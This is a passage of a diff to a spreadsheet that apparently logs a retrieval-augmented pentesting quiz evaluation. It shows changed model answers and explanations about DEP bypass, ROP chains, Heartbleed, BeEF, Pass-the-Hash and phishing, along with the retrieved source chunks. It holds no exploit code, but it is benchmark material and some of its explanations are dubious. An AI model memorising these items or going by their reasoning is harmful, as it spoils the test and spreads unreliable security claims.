-Explanation: Overwriting the return address of a function on the stack is the core technique used to bypass Data Execution Prevention (DEP) in many buffer overflow scenarios. DEP prevents code execution from data pages, such as the stack. By overwriting the return address, an attacker can redirect the program execution flow to existing executable code, often in non-DEP segments like the standard libraries or other executable regions (a method known as 'return-to-libc' or using 'ROP chains'). The other options, although they are legitimate attack strategies, do not directly address the issue of bypassing hardware-enforced DEP. Executing shellcode in a non-writable segment wouldn't typically circumvent DEP as it involves code execution from regions that should be non-executable if DEP is properly implemented. Creating a new thread and replacing legitimate software binaries with trojanized versions do not relate to the specific challenge of DEP but rather to gaining broader system access.</t>
+Explanation: In the context of buffer overflow exploitation, overwriting the return address of a function on the stack is most directly associated with bypassing modern CPU's hardware-enforced Data Execution Prevention (DEP). This technique allows an attacker to redirect the program flow to their malicious code, which can then be executed even if DEP is enabled.</t>
         </is>
       </c>
       <c r="G91" t="inlineStr">
@@ -6510,21 +6063,16 @@
 preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 0407d467-a3d5-4e44-8abc-61125edf63c7, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I91" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J91" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K91" t="inlineStr">
         <is>
@@ -6564,12 +6112,11 @@
         <is>
           <t>Answer: Buffer overflow
 Explanation: Buffer overflow remains one of the most effective techniques for bypassing memory protection
-mechanisms when attempting to execute arbitrary code. It exploits programming errors where programs write
-data beyond the bounds of allocated buffer memories, potentially allowing attackers to overwrite the return
-address of a function with malicious code's address. Heap spraying, while useful in certain scenarios, primarily
-aims at facilitating the reliability of other exploits by filling a large region of memory with shellcode. Ransomware
-deployment and phishing attacks are methods of attack delivery or initial compromise rather than techniques to
-bypass memory protections.</t>
+mechanisms when attempting to execute arbitrary code. It involves writing data into a buffer, causing it to
+overflow and potentially execute malicious code in non-executable regions of memory. While heap spraying,
+ransomware deployment, and phishing attacks are all legitimate attack strategies, they do not directly address the
+issue of bypassing hardware-enforced memory protection mechanisms like DEP (Data Execution Prevention) or ASLR
+(Address Space Layout Randomization).</t>
         </is>
       </c>
       <c r="G92" t="inlineStr">
@@ -6583,21 +6130,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I92" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J92" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K92" t="inlineStr">
         <is>
@@ -6636,7 +6178,7 @@
       <c r="F93" t="inlineStr">
         <is>
           <t>Answer: Exploiting Heartbleed to extract sensitive memory contents
-Explanation: The Heartbleed bug is a serious vulnerability in the OpenSSL cryptographic software library, which allows attackers to steal information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. Heartbleed exploits a flawed implementation of the heartbeat option in the OpenSSL protocol to read memory of systems protected by vulnerable versions of OpenSSL, potentially exposing sensitive data such as private keys, usernames, passwords, and other confidential information. Therefore, 'Exploiting Heartbleed to extract sensitive memory contents' is the correct choice. The other options, while relevant to penetration testing, do not specifically leverage the Heartbleed vulnerability. For instance, using the openssl tool to generate a malicious certificate or crafting a spear-phishing email involves different attack vectors not directly exploiting the Heartbleed bug. Similarly, injecting a rootkit through SQL injection vulnerabilities is unrelated to the Heartbleed bug and would require a separate vector of attack.</t>
+Explanation: The correct answer is 'Exploiting Heartbleed to extract sensitive memory contents'. The Heartbleed bug is a vulnerability in the OpenSSL cryptographic software library that allows attackers to read memory of systems protected by vulnerable versions of OpenSSL, potentially leading to the leakage of private keys, passwords, and other sensitive data. Choice 1 incorrectly describes the mechanism as related to SSL certificate validation, not touching upon the actual memory handling aspect. Choice 2 speaks to email-based attacks, which are unrelated to Heartbleed. Choice 3 involves SQL injection vulnerabilities, which are a different type of web application flaw and also unrelated to Heartbleed.</t>
         </is>
       </c>
       <c r="G93" t="inlineStr">
@@ -6650,21 +6192,16 @@
 preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 93d14658-5b22-4616-b6e7-c1d7e8d2504c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ed0ba5f3-2b68-477d-b01e-8dc5589ac689, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I93" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J93" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K93" t="inlineStr">
         <is>
@@ -6717,21 +6254,16 @@
 preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I94" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J94" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K94" t="inlineStr">
         <is>
@@ -6784,21 +6316,16 @@
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I95" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J95" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K95" t="inlineStr">
         <is>
@@ -6851,21 +6378,16 @@
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I96" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J96" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K96" t="inlineStr">
         <is>
@@ -6904,7 +6426,7 @@
       <c r="F97" t="inlineStr">
         <is>
           <t>Answer: BeEF (Browser Exploitation Framework)
-Explanation: BeEF is specifically designed for exploiting web browsers through client-side attacks. It provides a variety of command modules that can leverage vulnerabilities in web browsers to control managed browsers. On the other hand, Metasploit Framework, Burp Suite, and Wireshark are not specialized just for browser exploitation.</t>
+Explanation: BeEF is specifically designed for exploiting web browsers through client-side attacks. This tool provides a variety of command modules that can leverage vulnerabilities in web browsers to control managed browsers. On the other hand, Metasploit Framework, although versatile in conducting a range of penetration testing activities including client-side attacks, is not specialized just for browser exploitation. Burp Suite is primarily used for assessing the security of web applications but does not specialize in browser exploitation itself. Wireshark is a network protocol analyzer used for network troubleshooting, analysis, software and communications protocol development, and education, but not specifically for exploiting web browsers.</t>
         </is>
       </c>
       <c r="G97" t="inlineStr">
@@ -6918,21 +6440,16 @@
 preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 78887914-a26a-430c-bd9c-f955b8884feb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c722d3b3-3a6b-4c5c-ab92-a795ce66e638, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I97" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J97" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K97" t="inlineStr">
         <is>
@@ -6971,7 +6488,7 @@
       <c r="F98" t="inlineStr">
         <is>
           <t>Answer: ROP chaining
-Explanation: ROP (Return-Oriented Programming) chaining is the correct answer because it involves taking control of the stack to execute code sequences that are already present in a program's memory. This technique allows an attacker to bypass non-executable stack protections and execute arbitrary code without needing to inject new code into the target system. Heap spraying, fuzz testing, and SQL injection are not primarily used for bypassing non-executable stack protections in a target application.</t>
+Explanation: ROP (Return-Oriented Programming) chaining is the correct answer because it is a technique that involves taking control of the stack to execute code sequences that are already present in a program's memory. By using ROP, an attacker can execute arbitrary code by using snippets of existing code ('gadgets') that end in a 'ret' instruction, thus building a chain of gadget executions that achieves the desired malicious activity without needing to inject new code. Heap spraying primarily aims to facilitate arbitrary code execution but is not specifically designed for bypassing non-executable stack protections. Fuzz testing is a method used to find software bugs by providing invalid or unexpected inputs, and SQL injection is an attack technique that exploits vulnerabilities in web applications using SQL commands, neither of which are primarily used to bypass non-executable stack protections.</t>
         </is>
       </c>
       <c r="G98" t="inlineStr">
@@ -6985,21 +6502,16 @@
 preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I98" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J98" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K98" t="inlineStr">
         <is>
@@ -7038,7 +6550,7 @@
       <c r="F99" t="inlineStr">
         <is>
           <t>Answer: Pass-the-Hash
-Explanation: The Pass-the-Hash technique is most effective for escalating privileges within an Active Directory environment after obtaining user credentials. This technique exploits the way Windows handles user authentication using NTLM or Kerberos hashes, allowing attackers to authenticate against various services within the Windows environment without needing the plaintext password. It enables lateral movement and privilege escalation within the network. SMB Relay Attack, DNS Rebinding, and ARP Spoofing are other viable network attacks but are not specifically tailored for privilege escalation in Active Directory environments.</t>
+Explanation: The Pass-the-Hash technique is most effective for escalating privileges in an Active Directory environment once user credentials are compromised. This technique circumvents the need for plaintext user passwords by using the hash of a user's password to authenticate against various services within the Windows environment. It exploits the way Windows handles user authentication using NTLM or Kerberos hashes, allowing attackers to move laterally within the network. SMB Relay Attack and ARP Spoofing, although viable network attacks, are not specifically tailored for privilege escalation in Active Directory environments. DNS Rebinding is primarily a client-side attack that manipulates the resolution of domain names to gain unauthorized access to hosts, which does not directly assist in privilege escalation within Active Directory.</t>
         </is>
       </c>
       <c r="G99" t="inlineStr">
@@ -7052,21 +6564,16 @@
 preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 2)
 cowWhySo-pentest-redteam-steering.md (Chunk: 2ef34fed-876a-4bba-9f8e-65bab748e678, Type: dense, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 10ab44a6-b630-4fae-84ce-4a34439d57b4, Type: dense, Rank: 4)
-cowWhySo-pentest-redteam-steering.md (Chunk: 4d83f0d6-b826-4259-8ed2-4b776d900a97, Type: sparse, Rank: 5)
-adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate.md (Chunk: 6e810983-986e-482b-8ece-27564c73c29a, Type: sparse, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: a51a6d26-c177-466b-aa2a-5de8d47c5fe0, Type: dense, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: f9bf9901-c3d6-4172-925b-486e460b1f29, Type: dense, Rank: 8)
-cowWhySo-pentest-redteam-steering.md (Chunk: aca97c00-7481-40df-8227-dd2dd01a89d2, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 726c1e0b-212c-426e-aa7c-3636c6fa101e, Type: dense, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: 4d83f0d6-b826-4259-8ed2-4b776d900a97, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I99" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J99" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K99" t="inlineStr">
         <is>
@@ -7119,21 +6626,16 @@
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: sparse, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I100" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J100" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K100" t="inlineStr">
         <is>
@@ -7172,7 +6674,7 @@
       <c r="F101" t="inlineStr">
         <is>
           <t>Answer: ROP Chain
-Explanation: In the context of exploiting vulnerabilities in a modern Windows operating environment, the most effective technique for bypassing both non-executable stack and Address Space Layout Randomization (ASLR) protections is Return-Oriented Programming (ROP) chain. ROP chains work by utilizing existing code gadgets within the process's memory to perform arbitrary operations without injecting new code, which would be prevented by Data Execution Prevention (DEP). This technique can be employed in such a way as to reuse existing code from libraries or the executable, whose addresses might be predictable despite ASLR, using information leakage vulnerabilities or other methods to assist in locating these gadgets. In contrast, 'Heap Spraying' and 'Stack Buffer Overflow' rely on injecting or executing code on the stack or heap, which DEP blocks. 'Format String Vulnerability' is a different type of vulnerability that can be exploited for information disclosure but does not directly bypass these protections.</t>
+Explanation: The most effective technique for bypassing both non-executable stack and Address Space Layout Randomization (ASLR) protections in a modern Windows operating environment is the Return-oriented programming (ROP) chain. ROP works by utilizing portions of code already present in a process's memory, known as 'gadgets', in sequence to perform arbitrary operations. This means it does not rely on the injection of new code, which would be prevented by Data Execution Prevention (DEP), and it can be employed in such a way as to reuse existing code from libraries or the executable, whose addresses might be predictable despite ASLR, using information leakage vulnerabilities or other methods to assist in locating these gadgets. In contrast, Heap Spraying and Stack Buffer Overflow rely on injecting or executing code on the stack or heap, which DEP blocks. Format String Vulnerability is a different type of exploit that involves manipulating the format of output strings to execute arbitrary code but does not directly address ASLR or non-executable stack protections.</t>
         </is>
       </c>
       <c r="G101" t="inlineStr">
@@ -7186,21 +6688,16 @@
 preemware_pentestingeval.pdf (Chunk: e62a2b2b-31c7-42d4-91f0-d8e3c1852d64, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bd060a5f-5589-43ad-a132-ad7efb593ba8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 5f1aed82-6985-429f-a6a1-e86bd394b0ff, Type: sparse, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: 161bbefa-f921-4138-90fe-7697803bdba8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5bcad625-27ff-4c5d-acb6-97686598c38f, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I101" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J101" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K101" t="inlineStr">
         <is>
@@ -7239,7 +6736,7 @@
       <c r="F102" t="inlineStr">
         <is>
           <t>Answer: Exploiting buffer overflows in network services
-Explanation: Exploiting buffer overflows in network services is the most effective technique for maintaining persistent access to a compromised system without significant detection. This method often allows an attacker to execute arbitrary code directly on the host system at a low level, which can be leveraged to install backdoors or rootkits that can persist undetected through reboots and evade common security measures. While using a binder can help with initial infection, it does not focus on maintaining long-term access without detection. Conducting social engineering attacks is important for gaining initial network access but doesn't ensure persistent access. Performing SQL injection can bypass authentication mechanisms but does not inherently provide the ability to maintain long-term access or avoid detection.</t>
+Explanation: Exploiting buffer overflows in network services is the most effective technique for maintaining persistent access to a compromised system without significant detection. This method allows an attacker to execute arbitrary code directly on the host system at a low level, which can be leveraged to install backdoors or rootkits that can persist undetected through reboots and evade common security measures. While using a binder can help with initial infection, it does not provide long-term access without detection. Conducting social engineering attacks may gain initial network access but does not maintain persistent access. Performing SQL injection can bypass authentication mechanisms, but it is more about data exfiltration and does not inherently provide persistent host access or stealthy operation.</t>
         </is>
       </c>
       <c r="G102" t="inlineStr">
@@ -7253,21 +6750,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I102" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J102" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K102" t="inlineStr">
         <is>
@@ -7306,7 +6798,7 @@
       <c r="F103" t="inlineStr">
         <is>
           <t>Answer: Crafting phishing emails to gain network access credentials
-Explanation: In the context of red team operations aimed at testing an organization's data exfiltration defenses, crafting phishing emails to gain network access credentials is the most effective technique for initially gaining access to internal network resources. Phishing remains one of the most prevalent and successful methods for attackers to obtain sensitive information such as usernames and passwords, enabling them further access to an organization's internal networks. Although exploiting SQL injection and XSS are potent strategies, they generally require some form of web application interaction and do not directly confer internal network access as effectively or as stealthily as phishing. Performing a denial of service attack, while disruptive, does not facilitate network penetration or data access, making it less suitable for operations specifically testing data exfiltration defenses.</t>
+Explanation: In the context of red team operations aimed at testing an organization's data exfiltration defenses, the most effective technique for initially gaining access to internal network resources is crafting phishing emails to gain network access credentials. Phishing remains one of the most prevalent and successful methods for attackers to obtain sensitive information such as usernames and passwords, enabling them further access to an organization's internal networks. Although exploiting SQL injection vulnerabilities and cross-site scripting (XSS) are potent strategies, they generally require some form of web application interaction and do not directly confer internal network access as effectively or as stealthily as phishing. Performing a denial of service attack, while disruptive, does not facilitate network penetration or data access, making it less suitable for operations specifically testing data exfiltration defenses.</t>
         </is>
       </c>
       <c r="G103" t="inlineStr">
@@ -7320,21 +6812,16 @@
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 2)
